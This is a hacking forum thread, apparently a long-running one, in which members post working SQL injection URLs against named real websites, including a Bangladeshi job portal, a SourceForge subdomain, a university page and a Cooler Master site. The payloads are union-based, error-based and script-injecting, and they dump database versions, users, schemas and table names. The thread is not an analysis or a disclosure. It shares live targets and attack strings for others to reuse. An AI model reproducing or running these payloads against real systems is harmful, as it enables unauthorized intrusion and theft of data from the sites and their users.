SQL Injections

Discussion in 'Vulnerabilities' started by yarbabin, 27 Apr 2015.

  1. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    149
    Likes Received:
    426
    Reputations:
    31
    The site bills itself as the largest job-search site in Bangladesh, and the traffic matches.
    Microsoft SQL Server 2012 - 11.0.7462.6
    Code:
    http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and [email protected]@version -- &Fair_Id=5713
    Code:
    http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select db_name(1)) -- &Fair_Id=5713
    Code:
    http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select top 1 name from master..sysobjects where name not in ('sp_MSalreadyhavegeneration','sp_MSwritemergeperfcounter')) -- &Fair_Id=5713
    And a little something for variety

    PostgreSQL 9.4.24 SIXSS (they fixed it :()
    Code:
    http://www.acb.com/menu.php?id=-7253 union select 1,(chr(60)||chr(47)||chr(100)||chr(105)||chr(118)||chr(62)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(97)||chr(108)||chr(101)||chr(114)||chr(116)||chr(40)||chr(41)||chr(60)||chr(47)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||concat_ws(chr(32)||chr(35)||chr(32),session_user,version(),array_to_string(array(select DISTINCT schemaname from pg_catalog.pg_tables),','),array_to_string(array(select tablename from pg_catalog.pg_tables where schemaname='pg_catalog'),','),array_to_string(array(select attname from pg_catalog.pg_attribute where attrelid=(select oid from pg_catalog.pg_class where relname='pg_class') AND attnum>0),','))) --%20
    Sqlite 3.7.17
    Code:
    webdocs.cs.ualberta.ca/~hwsamuel/cardea/helix/catalog.php?id=4 union select 1,(sqlite_version())||char(35,35,35,35,35)||group_concat(tbl_name),3,group_concat(sql),5,6,(select group_concat(path) from document)||char(35,35,35,35,35)||(select group_concat(url) from document),8,9 from sqlite_master --%20
    Sqlite 3.3.7
    Code:
    www.newvideos.x0.com/channel/play.php?file_id=274' union select 1,2,(select sql from sqlite_master where type='table' limit 1,1),sqlite_version(),(select sql from sqlite_master where type='table' limit 0,1),6,7,8 from sqlite_master --%20
     
    #241 Baskin-Robbins, 31 Oct 2019
    Last edited: 31 Oct 2019
    sepo, ms13, seostock and 2 others like this.
  2. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    50
    Likes Received:
    11
    Reputations:
    13
    Code:
    http://www.horus.com.eg/newdetails.php?Id=-89+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6--
     
  3. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    A sourceforge subdomain
    Code:
    http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(), 1, 63), floor(rand(0)*2))) --%20
    Code:
    http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid((select schema_name from information_schema.schemata limit 1,1), 1, 63), floor(rand(0)*2))) --%20
     
    karkajoi and BabaDook like this.
  4. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Make It Yours, or greetings from cooler_master :)
    Pay attention ;)
    Code:
    https://makerhub.coolermaster.com/custom-lighting/download.php?id=-177 union select 1,2,3,4,5,6,(select schema_name from information_schema.schemata limit 0,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 --%20
     